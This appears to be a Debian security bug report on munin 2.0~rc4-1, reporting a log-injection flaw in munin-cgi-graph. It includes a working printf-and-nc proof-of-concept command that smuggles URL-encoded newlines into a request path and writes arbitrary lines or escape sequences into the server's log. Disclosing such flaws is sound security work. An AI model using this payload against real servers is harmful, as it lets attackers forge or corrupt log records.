Package: munin Version: 2.0~rc4-1 Severity: important Tags: security printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80
This command injects a line containing only foo into /var/log/munin/munin-cgi-graph.log. You can also inject escape sequences using the same technique. As far as I know this issue only affects sid and the 2.x branch. Helmut -- To UNSUBSCRIBE, email to [email protected] with a subject of "unsubscribe". Trouble? Contact [email protected]
